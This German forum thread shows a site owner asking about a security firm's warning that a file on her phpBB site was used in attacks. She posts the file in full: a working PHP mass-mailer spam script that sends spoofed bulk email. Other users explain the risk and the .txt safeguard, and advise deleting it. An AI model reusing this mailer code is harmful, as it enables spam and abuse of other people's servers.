Mail wegen Sicherheitslücke???

[Stonewoman]

Hallo,

ich habe gerade folgende Mail bekommen:

Sehr geehrte Damen und Herren,

kürzlich haben wir festgestellt, dass Ihre Seite "http://forum.skoliose-op.info/textdateien/mass.php.txt" dazu benutzt worden ist, andere Systeme anzugreifen.
Da Sie als Ansprechpartner für diese Domain eingetragen sind, informieren wir Sie über diesen Missbrauch.
Wir betreiben HoneyPot-Systeme die sog. RFI-Attacken erkennen können. RFI-Attacken nutzen Schwachstellen in Content-Management
Systemen (z.B. Joomla,Wordpress,etc) aus, um schadhaften Code nachzuladen und auszuführen.

Um sicherzustellen, dass von Ihrem System keine weiteren Angriffe mehr ausgehen, schließen Sie bitte schnellstmöglich diese Sicherheitslücken.
Wenn Sie diese Sicherheitslücken nicht schließen, droht Ihnen beispielsweise Datenverlust, erhöhter Datenverkehr sowie Systemausfälle Ihrer
Webseite.

Gerne bieten wir Ihnen an, Ihre Systeme abzusichern und in Zukunft zu pflegen.
Dazu erstellen wir Ihnen zeitnah ein individuelles Angebot.
Bei Interesse antworten Sie einfach auf diese E-Mail oder rufen Sie uns unter Tel.:xxx an.

Mit freundlichen Grüßen aus Karlsruhe,

Ihr GreeSec IT-Security Team

Ich weiß gar nicht, was ich davon halten soll. Will mich da jemand verarschen oder muss ich das ernst nehmen??

Was haltet ihr davon? Hat jemand einen Tipp oder Rat für mich?

Grüße, Stoni.

[wolfman24]

Ich hatte vor kurzem eine ähnliche Mail bekommen, daß von meinem DSL Anschluß mit meinem Computer Spam versendet wird. Man bietet mir aber eine günstige Virenlösung an. Ich habe erst mal alle Systeme gecheckt, aber nichts gefunden, also gehe ich davon aus, daß es nur ein dreister Versuch der Werbung war.

Am besten prüfst du deinen WebSpace auf Unauffälligkeiten, wenn du nichts findest, ist es wahrscheinlich auch nur dreiste Werbung. Da die Domain ja auf dich registriert ist und das jeder einsehen kann, kann dir auch jeder so einen Mist schicken.

Einfach nicht nervös machen lassen, phishing nach Bankdaten wird immer weniger, die suchen nur nach anderen Quellen und verunsichern die Leute. Das ist meine Meinung, vielleicht weiß aber auch jemand was konkretes zu diesem Thema.

[Stonewoman]

Hmmm... ich hab jetzt erst mal die Datei umbenannt... Vielleicht könnte ja mal ein Profi nen Blick draufwerfen:

Code: Alles auswählen

<html>
<head>
  <title>$ PHP Mass Mailer $</title>
  <!-- Just Style (Begin) -->
  <style type="text/css">
   body {
    background-color:#000000;
    font-family:verdana;
    font-size:11;
    color:#00ff00;
    }
   input {
    background-color:#FFFFFFF;
    font-family:Verdana;
    font-size:11;
    color:#000000;
    }
   textarea {
    background-color:#FFFFFF;
    font-family:arial;
    font-size:11;
    color:#000000;
    }
    pre {
    font-family:verdana;
    size:11;
    color:#00ff00;
    }
  </style>
  <!-- Just Style (End)) --> </head> 
  <body bgcolor=#FFFFFF text=#00ff00 link=#00ff00 alink=#00ff00 vlink=#00ff00>
   <p align="center">- re-Coded - by : &copy; <a href="java script:void(0)"; onClick="window.open('http://www.ianis.blogspot.com')";>th3sn0wbr4in</a> &copy;</p>  
   
   <?
    if ($action=="send") {
     $message = urlencode($message);
     $message = ereg_replace("%5C%22", "%22", $message);
     $message = urldecode($message);
     $message = stripslashes($message);
     $subject = stripslashes($subject);
     }
   ?>

   <form name="form1" method="post" action="" enctype="multipart/form-data">
    <pre>
     Your Email   :  <input type="text" name="from" value="<? print $from; ?>" size="50">
     Your Name  :  <input type="text" name="realname" value="<? print $realname; ?>" size="50">
     Reply-To     :  <input type="text" name="replyto" value="<? print $replyto; ?>" size="50">
     Attach File   :  <input type="file" name="file" size="50">
     Subject       :  <input type="text" name="subject" value="<? print $subject; ?>" size="50">
     Message     :  <textarea name="message" cols="60" rows="15"><? print $message; ?></textarea>     Target      :  <textarea name="emaillist" cols="60" rows="15"><? print $emaillist; ?></textarea>
                    <input type="radio" name="contenttype" value="plain"> Plain <input type="radio" name="contenttype" value="html" checked> HTML 
                    <br>
    </pre>
    <input type="hidden" name="action" value="send">
    <input type="submit" value="$ start $">
   </form>

   <?
    if ($action=="send") {
     $allemails = split("\n", $emaillist);
     $numemails = count($allemails);
     #Open the file attachment if any, and base64_encode it for email transport
      if ($file_name) {
       @copy($file, "./$file_name") or die("File cannot Uploaded to Server");
       $content = fread(fopen($file,"r"),filesize($file));
       $content = chunk_split(base64_encode($content));
       $uid = strtoupper(md5(uniqid(time())));
       $name = basename($file);
       }
      for($x=0; $x<$numemails; $x++){
       $to = $allemails[$x];
       if ($to) {
        $to = ereg_replace(" ", "", $to);
        $message = ereg_replace("&email&", $to, $message);
        $subject = ereg_replace("&email&", $to, $subject);
        print "Sent to $to";
        flush();
        $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
        $header .= "MIME-Version: 1.0\r\n";
        if ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
        if ($file_name) $header .= "--$uid\r\n";
        $header .= "Content-Type: text/$contenttype\r\n";
        $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
        $header .= "$message\r\n";
        if ($file_name) $header .= "--$uid\r\n";
        if ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
        if ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
        if ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
        if ($file_name) $header .= "$content\r\n";
        if ($file_name) $header .= "--$uid--";
        mail($to, $subject, "", $header);
        print " ---> Sent (<b>OK</b>) <br>";
        flush();
        }
      }
    }
  ?>

</body>
</html>
<script language=JavaScript>
window.name="a"
var newwindow;
function poptastic(url,name,left)
{
    newwindow=window.open(url,name,'height=275,width=330,left=' + left);
    if (window.focus) {newwindow.focus()}
}
function tutup()
{
    window.close()
}
function getCookie( name )
{
        var nameOfCookie = name + "=";
        var x = 0;
        while ( x <= document.cookie.length )
        {
                var y = (x+nameOfCookie.length);
                if ( document.cookie.substring( x, y ) == nameOfCookie ) {
                        if ( (endOfCookie=document.cookie.indexOf( ";", y )) == -1 )
                                endOfCookie = document.cookie.length;
                        return unescape( document.cookie.substring( y, endOfCookie ) );
                }
                x = document.cookie.indexOf( " ", x ) + 1;
                if ( x == 0 )
                        break;
        }
        return "";
}
// Randomizer
rnd.today=new Date();
rnd.seed=rnd.today.getTime();
  
function rnd() {
rnd.seed = (rnd.seed*9301+49297) % 233280;
return rnd.seed/(233280.0);
};

// Snow
// Set the number of snowflakes (more than 30 - 40 not recommended)
var snowmax=30

// Set the colors for the snow. Add as many colors as you like
var snowcolor=new Array("#aaaacc","#ddddFF","#ccccDD")

// Set the fonts, that create the snowflakes. Add as many fonts as you like
var snowtype=new Array("verdana")

// Set the letter that creates your snowflake (recommended:*)
var snowletter="."

// Set the speed of sinking (recommended values range from 0.3 to 2)
var sinkspeed=1.90

// Set the maximal-size of your snowflaxes
var snowmaxsize=25

// Set the minimal-size of your snowflaxes
var snowminsize=5

// Set the snowing-zone
// Set 1 for all-over-snowing, set 2 for left-side-snowing
// Set 3 for center-snowing, set 4 for right-side-snowing
var snowingzone=1

///////////////////////////////////////////////////////////////////////////
// CONFIGURATION ENDS HERE
///////////////////////////////////////////////////////////////////////////


// Do not edit below this line
var snow=new Array()
var marginbottom
var marginright
var timer
var i_snow=0
var x_mv=new Array();
var crds=new Array();
var lftrght=new Array();
var browserinfos=navigator.userAgent
var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
var ns6=document.getElementById&&!document.all
var opera=browserinfos.match(/Opera/) 
var browserok=ie5||ns6||opera

function randommaker(range) {      
   rand=Math.floor(range*Math.random())
    return rand
}

function initsnow() {
   if (ie5 || opera) {
      marginbottom = document.body.clientHeight
      marginright = document.body.clientWidth
   }
   else if (ns6) {
      marginbottom = window.innerHeight
      marginright = window.innerWidth
   }
   var snowsizerange=snowmaxsize-snowminsize
   for (i=0;i<=snowmax;i++) {
      crds[i] = 0;                     
       lftrght[i] = Math.random()*15;         
       x_mv[i] = 0.03 + Math.random()/10;
      snow[i]=document.getElementById("s"+i)
      snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
      snow[i].size=randommaker(snowsizerange)+snowminsize
      snow[i].style.fontSize=snow[i].size
      snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
      snow[i].sink=sinkspeed*snow[i].size/5
      if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
      if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
      if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
      if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
      snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
      snow[i].style.left=snow[i].posx
      snow[i].style.top=snow[i].posy
   }
   movesnow()
}

function movesnow() {
   for (i=0;i<=snowmax;i++) {
      crds[i] += x_mv[i];
      snow[i].posy+=snow[i].sink
      snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
      snow[i].style.top=snow[i].posy
      
      if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
         if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
         if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
         if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
         if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
         snow[i].posy=0
      }
   }
   var timer=setTimeout("movesnow()",50)
}

for (i=0;i<=snowmax;i++) {
   document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
}
if (browserok) {
   window.onload=initsnow
}
</script>

[Pyramide]

Da das Script fast alle Daten ungeprüft an die E-Mail übergibt, kann damit jeder beliebige Mails über deinen Server verschicken. Mal abgesehen davon, dass das Script einen unsicheren Programmierstil (Stichwort register_globals) verwendet.

[Stonewoman]

Na bravo, ich versteh nur Bahnhof... was muss ich denn jetzt tun?? Und das Script hab ich nicht geschrieben (sowas könnte ich auch gar nicht) , das war doch sicher beim Forum dabei, oder?

[Boecki91]

Ne die ist nicht dabei gewesen.
Und sie ist gefährlich.
Lösche sie.

Nun die Frage wie kommt die Datei da hin?

Hast du den Ordner "textdateien" selbst erstellt?
Laufen noch andere Scripte auf dem Webspace/Server?
Haben andere Leute Zugriff auf den Webspace?
Hand aufs Herz sind die Zugangspasswörter komplex genug und nicht gespeichert?
Welche Modifikationen sind im phpBB eingebaut?
Wer hat sie eingebaut?

Liste alles auf was dir sonst noch wichtig vorkommt.

[the-boar]

Hallo Boecki91,
ich bin Stonis Mann und mir ist da was eingefallen: Den Ordner Textdateien haben wir mal erstellt, um hier im Forum gewisse Dateien als Code zum Downlaod bereitzustellen. Wenn wir mal Probleme hatten, hatten wir die entsprechenden Dateien einfach in ***.php.txt umbenannt und dann im Ordner Textdateien abgelegt. Hatten die ***.php.txt Dateien aber nicht gelöscht.
Besteht dadurch immer noch eine gewisse Gefahr? Haben vorsichtshalber den Inhalt des Ordners gelöscht, da es eigentlich noch vom phpBB2 war.
Das mit der Mail erstehe ich trotzdem nicht. Wir hatten 2008 das Problem, ist aber dann gelöst worden.

[djchrisnet]

um das mal klar zu stellen.

solang der code als .txt gespeichert ist, wird der code beim aufrufen auch nicht durch php geparsed.

klar ist der code sicherheitstechnisch höchst unsicher und absolut unzulänglich programmiert, dennoch kann man über eine .txt datei keine spammails versenden!

deshalb die klare ansage: die mail is werbung! vermutlich hat der absender die datei url in google gefunden. der code is müll aber als .txt gespeichert nicht gefährlich.

dennoch empfehle auch ich das löschen =)

[Boecki91]

Wie schnell man die txt Endung übersieht
Passiert sein wird von der Addresse wohl nichts aber dennoch die Datei löschen